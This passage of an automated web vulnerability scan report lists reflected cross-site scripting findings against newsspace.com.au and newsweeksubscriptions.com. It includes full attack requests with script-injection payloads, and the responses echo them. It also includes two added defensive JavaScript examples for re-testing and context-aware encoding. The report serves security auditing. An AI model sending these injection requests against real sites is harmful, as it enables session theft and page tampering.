This behaviour demonstrates that it is possible to terminate the JavaScript string into which the submitted data is copied: both the double quote and the semicolon are reflected unencoded. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript, but this was not successful. Manually examine the application's behaviour and identify any input validation or other obstacles that may be in place; the absence of an automated proof-of-concept does not make the sink safe, and a fix should be verified by re-sending the canary and confirming that the quote is encoded or escaped in the response.
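The re-test step above can be scripted. The following is an added example (not part of the scanner output): it classifies how a canary value comes back in a response body and checks whether an inline script is left with an unterminated string literal, which is exactly what finding 1.192 reports. The response bodies it runs on are constructed from the fragment shown in this report plus two hypothetical fixed variants; nothing is fetched from the site, and the function names are this example's own.

```javascript
// Added example, not part of the scanner output. Classifies how a canary
// value comes back in a response body so a "Firm" finding like 1.192 can be
// re-tested after a fix without reading the page source by hand. The bodies
// below are constructed from the fragment shown in this report (and two
// hypothetical fixed variants); nothing is fetched from the site.

const CANARY = '16009";a1ac7d093df'; // the 1.192 payload, as it was echoed

// Canonical forms the canary takes once a server-side encoder touches it.
function entityEncoded(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;' };
  return s.replace(/[&<>"]/g, (c) => map[c]);
}
function jsEscaped(s) {
  return s.replace(/\\/g, '\\\\').replace(/"/g, '\\"');
}

// Returns 'raw-in-script', 'raw-in-html', 'entity-encoded', 'js-escaped' or 'absent'.
function classifyReflection(body, canary) {
  const idx = body.indexOf(canary);
  if (idx !== -1) {
    // Raw echo: decide whether it landed inside an open <script> block by
    // counting openers and closers before the reflection point.
    const before = body.slice(0, idx);
    const opens = (before.match(/<script\b/gi) || []).length;
    const closes = (before.match(/<\/script>/gi) || []).length;
    return opens > closes ? 'raw-in-script' : 'raw-in-html';
  }
  if (body.includes(entityEncoded(canary))) return 'entity-encoded';
  if (body.includes(jsEscaped(canary))) return 'js-escaped';
  return 'absent';
}

// A quick check for the exact effect the finding describes: an injected
// quote terminates a double-quoted string literal, leaving an odd number of
// unescaped double quotes in some inline script block. (This does not
// tokenize JS; a quote inside a comment or regex literal would skew it.)
function hasUnterminatedStringLiteral(body) {
  const blocks = body.matchAll(/<script\b[^>]*>([\s\S]*?)<\/script>/gi);
  for (const [, js] of blocks) {
    const quotes = (js.match(/(?<!\\)"/g) || []).length;
    if (quotes % 2 === 1) return true;
  }
  return false;
}

// Constructed from the 1.192 response fragment: raw echo inside a script.
const BEFORE_FIX = `<html><head><script type="text/javascript">//<![CDATA[
  $(function (){
    $("#main_menu-${CANARY}")
      .addClass("current")
  });
//]]></script></head></html>`;

// Hypothetical responses after two different fixes, for comparison.
const AFTER_FIX_JS = BEFORE_FIX.replace(CANARY, jsEscaped(CANARY));
const AFTER_FIX_HTML = `<div id="main_menu-${entityEncoded(CANARY)}"></div>`;

console.log(classifyReflection(BEFORE_FIX, CANARY), hasUnterminatedStringLiteral(BEFORE_FIX));
console.log(classifyReflection(AFTER_FIX_JS, CANARY), hasUnterminatedStringLiteral(AFTER_FIX_JS));
console.log(classifyReflection(AFTER_FIX_HTML, CANARY));
```

Feed the function the actual response body captured after the fix; a result other than `entity-encoded` or `js-escaped` means the sink is still reachable and the "Firm" finding should be treated as open.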

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news.com.au16009"%3ba1ac7d093df HTTP/1.1
Host: www.newsspace.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: LiteSpeed
Last-Modified: Tue, 04 Oct 2011 21:37:46 GMT
Content-Type: text/html; charset=utf-8
X-Server: http1.vega
Expires: Tue, 04 Oct 2011 21:37:46 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:37:46 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 35298

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
<meta http-equiv="Content-Type" co
...[SNIP]...
<![CDATA[
                       $(function (){
                           $("#main_menu-news.com.au16009";a1ac7d093df")
                               .addClass("current")
                               .find(">
...[SNIP]...

1.193. https://www.newsweeksubscriptions.com/4freetrial29/index.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /4freetrial29/index.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2cabd<script>alert(1)</script>7f6f1f6df69 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /4freetrial292cabd<script>alert(1)</script>7f6f1f6df69/index.php?off2on_login_url=/promo&off2on_code=702/29 HTTP/1.1
Host: www.newsweeksubscriptions.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.newsweeksubscriptions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bcntnaa386q06i6k72ddc05vq5

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:15:10 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 524
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /4freetrial292cabd<script>alert(1)</script>7f6f1f6df69 is not found !</p>
...[SNIP]...

1.194. https://www.newsweeksubscriptions.com/4freetrial29/index.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /4freetrial29/index.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d3789<script>alert(1)</script>41a04ebeece was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /4freetrial29/d3789<script>alert(1)</script>41a04ebeece?off2on_login_url=/promo&off2on_code=702/29 HTTP/1.1
Host: www.newsweeksubscriptions.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.newsweeksubscriptions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bcntnaa386q06i6k72ddc05vq5

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:15:15 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 783
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /4freetrial29/d3789<script>alert(1)</script>41a04ebeece is not found !</p>
...[SNIP]...

1.195. https://www.newsweeksubscriptions.com/4freetrial29/index.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /4freetrial29/index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b2cc"><script>alert(1)</script>8dc6c819d52 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /4freetrial29/index.php?off2on_login_url=/promo&off2on_code=70/4b2cc"><script>alert(1)</script>8dc6c819d522/29 HTTP/1.1
Host: www.newsweeksubscriptions.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.newsweeksubscriptions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bcntnaa386q06i6k72ddc05vq5

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:15:01 GMT
Server: Apache/2.2.16 (Unix)
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 53154


<html>
<head>
<title>NewsweekSubscriptions.com - Subscribe to Newsweek Magazine</title>
<meta name="Keywords" content="Title:Newsweek, Newsweek Magazine, Newsweek Subscription, Newsweek Magazine Su
...[SNIP]...
<input autocomplete="off" type="hidden" name="off2on_code" id="off2on_code" value="70/4b2cc"><script>alert(1)</script>8dc6c819d522/29">
...[SNIP]...

1.196. https://www.newsweeksubscriptions.com/4freetrial29/index.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /4freetrial29/index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5e50a'%3balert(1)//2258684782 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5e50a';alert(1)//2258684782 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /4freetrial29/index.php?off2on_login_url=/promo&off2on_code=70/5e50a'%3balert(1)//22586847822/29 HTTP/1.1
Host: www.newsweeksubscriptions.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.newsweeksubscriptions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bcntnaa386q06i6k72ddc05vq5

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:15:06 GMT
Server: Apache/2.2.16 (Unix)
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 53122


<html>
<head>
<title>NewsweekSubscriptions.com - Subscribe to Newsweek Magazine</title>
<meta name="Keywords" content="Title:Newsweek, Newsweek Magazine, Newsweek Subscription, Newsweek Magazine Su
...[SNIP]...
;
       
   var url = "index.php?submitted=V&kind=guard&t=&extra_info=&extra_info2=";


url += '&off2on_login_url=/promo';


url += '&off2on_code=70/5e50a';alert(1)//22586847822/29';


       if ((guard_win==null) && (document.cookie.indexOf('guard')==-1)) {
        //alert('1');
        guard_win=window.open(url, '_amslg_guard',"width=
...[SNIP]...

1.197. https://www.newsweeksubscriptions.com/4freetrial29/index.php [off2on_code parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /4freetrial29/index.php

Issue detail

The value of the off2on_code request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12b7d"><script>alert(1)</script>ac719900224 was submitted in the off2on_code parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /4freetrial29/index.php?off2on_login_url=/promo&off2on_code=702/2912b7d"><script>alert(1)</script>ac719900224 HTTP/1.1
Host: www.newsweeksubscriptions.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.newsweeksubscriptions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bcntnaa386q06i6k72ddc05vq5

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:14:52 GMT
Server: Apache/2.2.16 (Unix)
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 53152


<html>
<head>
<title>NewsweekSubscriptions.com - Subscribe to Newsweek Magazine</title>
<meta name="Keywords" content="Title:Newsweek, Newsweek Magazine, Newsweek Subscription, Newsweek Magazine Su
...[SNIP]...
<input autocomplete="off" type="hidden" name="off2on_code" id="off2on_code" value="702/2912b7d"><script>alert(1)</script>ac719900224">
...[SNIP]...

1.198. https://www.newsweeksubscriptions.com/4freetrial29/index.php [off2on_code parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /4freetrial29/index.php

Issue detail

The value of the off2on_code request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4954c'%3balert(1)//fcaff3a8f4a was submitted in the off2on_code parameter. This input was echoed as 4954c';alert(1)//fcaff3a8f4a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /4freetrial29/index.php?off2on_login_url=/promo&off2on_code=702/294954c'%3balert(1)//fcaff3a8f4a HTTP/1.1
Host: www.newsweeksubscriptions.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.newsweeksubscriptions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bcntnaa386q06i6k72ddc05vq5

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:14:56 GMT
Server: Apache/2.2.16 (Unix)
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 53122


<html>
<head>
<title>NewsweekSubscriptions.com - Subscribe to Newsweek Magazine</title>
<meta name="Keywords" content="Title:Newsweek, Newsweek Magazine, Newsweek Subscription, Newsweek Magazine Su
...[SNIP]...
   
   var url = "index.php?submitted=V&kind=guard&t=&extra_info=&extra_info2=";


url += '&off2on_login_url=/promo';


url += '&off2on_code=702/294954c';alert(1)//fcaff3a8f4a';


       if ((guard_win==null) && (document.cookie.indexOf('guard')==-1)) {
        //alert('1');
        guard_win=window.open(url, '_amslg_guard',"width=295,
...[SNIP]...

1.199. https://www.newsweeksubscriptions.com/4freetrial29/index.php [off2on_login_url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /4freetrial29/index.php

Issue detail

The value of the off2on_login_url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 568f3"><script>alert(1)</script>baf6596ea92 was submitted in the off2on_login_url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /4freetrial29/index.php?off2on_login_url=/promo568f3"><script>alert(1)</script>baf6596ea92&off2on_code=702/29 HTTP/1.1
Host: www.newsweeksubscriptions.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.newsweeksubscriptions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bcntnaa386q06i6k72ddc05vq5

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:14:43 GMT
Server: Apache/2.2.16 (Unix)
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 53152


<html>
<head>
<title>NewsweekSubscriptions.com - Subscribe to Newsweek Magazine</title>
<meta name="Keywords" content="Title:Newsweek, Newsweek Magazine, Newsweek Subscription, Newsweek Magazine Su
...[SNIP]...
<input autocomplete="off" type="hidden" name="off2on_login_url" id="off2on_login_url" value="/promo568f3"><script>alert(1)</script>baf6596ea92">
...[SNIP]...

1.200. https://www.newsweeksubscriptions.com/4freetrial29/index.php [off2on_login_url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /4freetrial29/index.php

Issue detail

The value of the off2on_login_url request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d5d1c'%3balert(1)//7a28207e662 was submitted in the off2on_login_url parameter. This input was echoed as d5d1c';alert(1)//7a28207e662 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
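The remediation advice above applies to every newsweeksubscriptions.com finding in 1.193 through 1.200, which between them cover the three reflection contexts in this report: a text node, a double-quoted attribute value, and a single-quoted JavaScript string literal. The following added example (not the application's code) reconstructs those three templates from the response fragments, renders them first by raw concatenation as the application does and then with a context-specific encoder, and executes the inline script with a stubbed alert() to show which version fires. The template shapes and function names are assumptions; only the parameter name off2on_code and the payloads come from the report.

```javascript
// Added example, not code from the scanned application. It reconstructs the
// three reflection contexts seen in findings 1.193-1.200 (text node, quoted
// attribute, single-quoted JS string literal), renders them by raw
// concatenation as the application does, then with context-specific
// encoding, and runs the inline script with a stubbed alert() to show which
// version fires. Template shapes and function names are assumptions; the
// parameter name off2on_code and the payloads are from the report.

// HTML text nodes and quoted attribute values: entity-encode the five
// significant characters. Only sufficient for attributes that are quoted.
function encodeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// JS string literal inside an inline <script>: JSON.stringify handles quotes
// and backslashes but leaves '<' and '>' alone, so a value containing
// "</script>" would still close the block for the HTML parser. Escape them
// as \u003c / \u003e so the literal is also safe inside HTML.
function encodeJsString(s) {
  return JSON.stringify(String(s))
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e');
}

// The templates as the report shows them: the value is spliced in verbatim.
function renderVulnerable(v) {
  return [
    `<p>Campaign url ${v} is not found !</p>`,
    `<input type="hidden" name="off2on_code" value="${v}">`,
    `<script>var url = "index.php?"; url += '&off2on_code=${v}';</script>`,
  ].join('\n');
}

// Same templates with the encoder that matches each context. The JS value is
// emitted as a JSON literal and URL-encoded at runtime instead of being
// pasted between single quotes.
function renderHardened(v) {
  return [
    `<p>Campaign url ${encodeHtml(v)} is not found !</p>`,
    `<input type="hidden" name="off2on_code" value="${encodeHtml(v)}">`,
    `<script>var url = "index.php?"; url += '&off2on_code=' + encodeURIComponent(${encodeJsString(v)});</script>`,
  ].join('\n');
}

// Count the <script openers a browser's HTML parser would see.
function countScriptTags(html) {
  return (html.match(/<script\b/gi) || []).length;
}

// Run the first inline script block a browser would reach, with alert()
// replaced by a recorder. This is a stand-in for the browser, not a sandbox.
// Returns whether alert fired and the `url` the script left behind (null if
// the script never defined it).
function runInlineScript(html) {
  const m = /<script>([\s\S]*?)<\/script>/.exec(html);
  const body = m ? m[1] : '';
  let alerted = false;
  // A trailing line comment in the injected payload would otherwise swallow
  // the return statement, hence the newline before it.
  const fn = new Function('alert', body + '\n;return typeof url === "undefined" ? null : url;');
  const url = fn(() => { alerted = true; });
  return { alerted, url };
}

// Payloads from findings 1.197 and 1.198, as the report shows them.
const ATTR_PAYLOAD = '12b7d"><script>alert(1)</script>ac719900224';
const JS_PAYLOAD = "4954c';alert(1)//fcaff3a8f4a";

console.log('vulnerable, JS payload  :', runInlineScript(renderVulnerable(JS_PAYLOAD)));
console.log('hardened,   JS payload  :', runInlineScript(renderHardened(JS_PAYLOAD)));
console.log('vulnerable, attr payload:', countScriptTags(renderVulnerable(ATTR_PAYLOAD)), 'script tags');
console.log('hardened,   attr payload:', countScriptTags(renderHardened(ATTR_PAYLOAD)), 'script tag');
```

The hardened JS template still carries the user value into the page, but as a JSON literal the HTML parser cannot break out of and the JS parser cannot terminate early; moving the value into a data attribute read by a separate script is the cleaner option the remediation text alludes to when it says to avoid the script context altogether.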

Request

GET /4freetrial29/index.php?off2on_login_url=/promod5d1c'%3balert(1)//7a28207e662&off2on_code=702/29 HTTP/1.1
Host: www.newsweeksubscriptions.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.newsweeksubscriptions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bcntnaa386q06i6k72ddc05vq5

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:14:47 GMT
Server: Apache/2.2.16 (Unix)
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 53122


<html>
<head>
<title>NewsweekSubscriptions.com - Subscribe to Newsweek Magazine</title>
<meta name="Keywords" content="Title:Newsweek, Newsweek Magazine, Newsweek Subscription, Newsweek Magazine Su
...[SNIP]...
ion()
{
   if (openguard_busy==1) { return; }
   openguard_busy=1;
       
   var url = "index.php?submitted=V&kind=guard&t=&extra_info=&extra_info2=";


url += '&off2on_login_url=/promod5d1c';alert(1)//7a28207e662';


url += '&off2on_code=702/29';


       if ((guard_win==null) && (document.cookie.indexOf('guard')==-1)) {
        //alert('
...[SNIP]...

1.201. https://www.newsweeksubscriptions.com/702FT [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /702FT

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 68760<script>alert(1)</script>0202b58a743 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /702FT68760<script>alert(1)</script>0202b58a743 HTTP/1.1
Host: www.newsweeksubscriptions.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.newsweeksubscriptions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bcntnaa386q06i6k72ddc05vq5

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:14:36 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 517
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /702FT68760<script>alert(1)</script>0202b58a743 is not found !</p>
...[SNIP]...

1.202. https://www.newsweeksubscriptions.com/FTcontrol/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b151f<script>alert(1)</script>4ab5958d131 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FTcontrolb151f<script>alert(1)</script>4ab5958d131/ HTTP/1.1
Referer: https://www.newsweeksubscriptions.com/FTcontrol/index.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:10:39 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 521
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrolb151f<script>alert(1)</script>4ab5958d131 is not found !</p>
...[SNIP]...

1.203. https://www.newsweeksubscriptions.com/FTcontrol/Netsparker1c7b16f68f3d4364880fe7b87f27e95f.com [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/Netsparker1c7b16f68f3d4364880fe7b87f27e95f.com

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3a498<script>alert(1)</script>553705f4106 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /FTcontrol3a498<script>alert(1)</script>553705f4106/Netsparker1c7b16f68f3d4364880fe7b87f27e95f.com HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:13:56 GMT
Server: Apache/2.2.16 (Unix)
